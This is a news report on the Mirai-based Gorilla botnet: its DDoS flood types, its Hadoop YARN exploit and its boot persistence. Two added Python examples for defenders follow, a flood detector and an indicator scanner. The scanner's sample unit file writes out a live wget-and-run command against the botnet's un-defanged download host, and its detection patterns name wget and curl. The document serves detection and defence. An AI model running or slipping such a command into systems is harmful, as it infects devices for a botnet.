New Gorilla Botnet Deploys Over 300,000 DDoS Attacks Worldwide

October 07, 2024Ravie LakshmananInternet of Things Security / Botnet

Cybersecurity researchers have discovered a new botnet malware family called Gorilla (aka GorillaBot), a variant built on the leaked Mirai botnet source code.


According to a report by cybersecurity company NSFOCUS, the botnet “dispatched in excess of 300,000 assault directives, showing alarming density” between September 4 and September 27, 2024. Roughly 20,000 attack commands were issued per day to launch distributed denial-of-service (DDoS) attacks.


The attacks targeted more than 100 countries and hit universities, government websites, telecom providers, banks, and the gaming and gambling sectors. China, the United States, Canada, and Germany were the most heavily targeted.

The Beijing-based firm said Gorilla primarily uses UDP flood, ACK BYPASS flood, Valve Source Engine (VSE) flood, SYN flood, and ACK flood techniques to carry out DDoS attacks. Because UDP is connectionless, the botnet can spoof arbitrary source IP addresses to generate large volumes of traffic.
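The flood types listed above are volumetric: what distinguishes them on the wire is the protocol or TCP flag, a packet rate far above baseline, and (for the spoofed UDP case) a large number of distinct source addresses aimed at one destination. The following added example, which is not from NSFOCUS or the article, sketches a defender-side heuristic over flow records: it buckets flows by destination, attack kind and one-second window, and flags windows that exceed a packets-per-second threshold while also showing many distinct sources. The Flow record shape, thresholds and sample traffic are all constructed assumptions, not real telemetry.

```python
"""Added example: volumetric-flood heuristic over constructed flow records.
Not code from NSFOCUS or the article; Flow fields and thresholds are assumptions."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    ts: float        # timestamp in seconds (assumed field)
    src: str         # source IP as seen on the wire (spoofable for UDP)
    dst: str         # destination IP
    proto: str       # "udp" or "tcp"
    tcp_flags: str   # "S" for SYN-only, "A" for ACK-only, "" for UDP
    packets: int     # packets in this flow record


def classify(flow):
    """Map a flow record to one of the flood kinds named in the report."""
    if flow.proto == "udp":
        return "udp_flood"
    if flow.proto == "tcp":
        if flow.tcp_flags == "S":
            return "syn_flood"
        if flow.tcp_flags == "A":
            return "ack_flood"
    return None


def detect_floods(flows, window=1.0, pps_threshold=10000, min_sources=100):
    """Flag (dst, kind, window) buckets whose packet rate and distinct-source
    count both exceed the thresholds. Returns a list of alert dicts."""
    buckets = defaultdict(lambda: {"packets": 0, "sources": set()})
    for f in flows:
        kind = classify(f)
        if kind is None:
            continue
        key = (f.dst, kind, int(f.ts // window))
        buckets[key]["packets"] += f.packets
        buckets[key]["sources"].add(f.src)

    alerts = []
    for (dst, kind, w), b in sorted(buckets.items()):
        pps = b["packets"] / window
        if pps >= pps_threshold and len(b["sources"]) >= min_sources:
            alerts.append({"dst": dst, "kind": kind, "window": w,
                           "pps": pps, "sources": len(b["sources"])})
    return alerts


def sample_flows():
    """Constructed traffic: 500 spoofed sources each sending 40 UDP packets to
    203.0.113.10 inside the first second, a small SYN burst below threshold,
    and benign ACK background. None of this is real captured data."""
    flows = [Flow(0.001 * i, f"10.{(i >> 8) & 255}.{i & 255}.7",
                  "203.0.113.10", "udp", "", 40) for i in range(500)]
    flows += [Flow(0.5, f"192.0.2.{i}", "203.0.113.10", "tcp", "S", 10)
              for i in range(50)]
    flows += [Flow(0.7, f"198.51.100.{i}", "203.0.113.10", "tcp", "A", 5)
              for i in range(20)]
    return flows


if __name__ == "__main__":
    for alert in detect_floods(sample_flows()):
        print(alert)
```

The distinct-source requirement is what separates a spoofed UDP flood from a single noisy client; a real deployment would replace the fixed thresholds with a per-destination baseline and feed it from NetFlow/IPFIX or packet captures rather than in-memory records.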

Besides supporting multiple CPU architectures, including ARM, MIPS, x86_64, and x86, the botnet can connect to one of five predefined command-and-control (C2) servers to await DDoS commands.

The malware also embeds functionality to exploit a security flaw in Apache Hadoop YARN RPC to achieve remote code execution. This vulnerability has been exploited in the wild since at least 2021, as previously reported by Alibaba Cloud and Trend Micro.

Persistence on the host is established by creating a service file named custom.service in the “/etc/systemd/system/” directory and configuring it to run automatically on every system boot.


That service downloads and executes a shell script (“lol.sh”) from a remote server (“pen.gorillafirewall[.]su”). Similar commands are also inserted into the “/etc/inittab,” “/etc/profile,” and “/boot/bootcmd” files so that the script is downloaded and run on system boot or user login.
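The four persistence locations and two indicators named above are enough for a host-level check. The following added example, which is not code from NSFOCUS or the article, reads those files from a live system or a mounted disk image and reports any line that references the dropped script name or the download host. The sample file contents are constructed to illustrate a hit and a clean file; they are not taken from a real infection, and the indicator patterns and function names are this example's own assumptions.

```python
"""Added example: scan the persistence locations attributed to Gorilla for the
indicators named in the report. Not NSFOCUS or article code; sample content is constructed."""
import re
import sys
from pathlib import Path

# Persistence locations named in the report.
PERSISTENCE_PATHS = (
    "/etc/systemd/system/custom.service",
    "/etc/inittab",
    "/etc/profile",
    "/boot/bootcmd",
)

# Indicators from the report: the dropped script name and the download host
# (defanged in the article as pen.gorillafirewall[.]su).
INDICATOR_PATTERNS = {
    "script": re.compile(r"\blol\.sh\b"),
    "c2_host": re.compile(r"pen\.gorillafirewall\.su", re.IGNORECASE),
    "download": re.compile(r"\b(?:wget|curl)\b.*\b(?:lol\.sh|gorillafirewall)"),
}


def scan_file_contents(files):
    """files: mapping of path -> text already read from disk.
    Returns a list of (path, line_number, matched_indicator_names)."""
    findings = []
    for path, text in files.items():
        for lineno, line in enumerate(text.splitlines(), 1):
            names = tuple(sorted(name for name, pat in INDICATOR_PATTERNS.items()
                                 if pat.search(line)))
            if names:
                findings.append((path, lineno, names))
    return findings


def scan_host(root="/"):
    """Read the persistence files from a live host, or from an offline image
    mounted at `root`, and scan them. Missing files are skipped."""
    files = {}
    for rel in PERSISTENCE_PATHS:
        p = Path(root) / rel.lstrip("/")
        if p.is_file():
            files[rel] = p.read_text(errors="replace")
    return scan_file_contents(files)


# Constructed sample content (hypothetical, not from a real infection):
# one unit file that fetches the script, and one benign profile.
SAMPLE_FILES = {
    "/etc/systemd/system/custom.service": (
        "[Unit]\nDescription=custom\n\n[Service]\n"
        "ExecStart=/bin/sh -c 'wget -qO /tmp/lol.sh "
        "http://pen.gorillafirewall.su/lol.sh; sh /tmp/lol.sh'\n"
        "\n[Install]\nWantedBy=multi-user.target\n"
    ),
    "/etc/profile": "export PATH=/usr/local/bin:$PATH\numask 022\n",
}


if __name__ == "__main__":
    # Usage: python scan.py [mount_root]; defaults to the running system.
    root = sys.argv[1] if len(sys.argv) > 1 else "/"
    for path, lineno, names in scan_host(root):
        print(f"{path}:{lineno}: {', '.join(names)}")
```

Run it against a mounted image root (for example the mount point of a suspect device's filesystem) rather than only the live host, since a script launched from the same locations can tamper with what a running system reports. Any hit warrants pulling the referenced script and the unit file for analysis before removal.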

“The botnet introduced multiple DDoS methodologies and utilized encryption algorithms commonly linked with the Keksec group to obscure vital details, along with deploying multiple strategies to maintain sustained control over IoT devices and cloud servers, showcasing a high level of evasion towards detection as an evolving botnet lineage,” NSFOCUS said.
